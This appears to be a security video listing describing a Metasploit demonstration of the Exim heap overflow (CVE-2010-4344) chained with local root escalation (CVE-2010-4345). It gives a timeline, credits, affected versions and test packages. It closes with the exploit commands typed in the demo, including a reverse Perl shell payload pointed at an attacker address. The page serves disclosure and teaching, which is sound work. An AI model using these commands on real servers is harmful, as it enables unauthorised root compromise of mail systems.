Timeline:
Vulnerability discovered on 2010-12-07 by Sergey Kononenko
Vulnerability confirmed on 2010-12-10 by David Woodhouse
Exploit released on 2010-12-10 by hdm & jduck
Vulnerability corrected on 2008-12-02, but not identified as a security fix for two years, so the fix was not backported into most OS distributions.
Provided by:
Sergey Kononenko
David Woodhouse
jduck (Metasploit Team)
hdm (Metasploit Team)
References:
CVE-2010-4345
CVE-2010-4344
OSVDB-69685
Affected versions:
Versions up to and including 4.69, depending on the distribution's versioning
Tested on Debian Lenny 5.0 with:
exim4-base_4.69-9_i386.deb
exim4-config_4.69-9_all.deb
exim4-daemon-light_4.69-9_i386.deb
exim4_4.69-9_all.deb
(packages from http://mirror.ovh.net/debian/pool/main/e/exim4/ ; installed versions checked with: dpkg -l | grep exim4)
Description:
This Metasploit module exploits a heap buffer overflow in versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon (CVE-2010-4344). An additional vulnerability, CVE-2010-4345, was also used in the attack that led to the discovery of this bug; it allows a local user to gain root privileges from the Exim user account. If a Perl interpreter is found on the remote system, this module will automatically exploit the secondary bug as well to obtain root.
Metasploit demo (commands as typed in the video; the two dpkg/tail lines are run on the target to show the installed package and watch the Exim main log):
dpkg -l | grep exim4
tail -f /var/log/exim4/mainlog
use exploit/unix/smtp/exim4_string_format
set RHOST 192.168.178.52
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.21
exploit
id
owned
Tags: smtp, mail server, metasploit, 0day, exim, linux, unix
Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.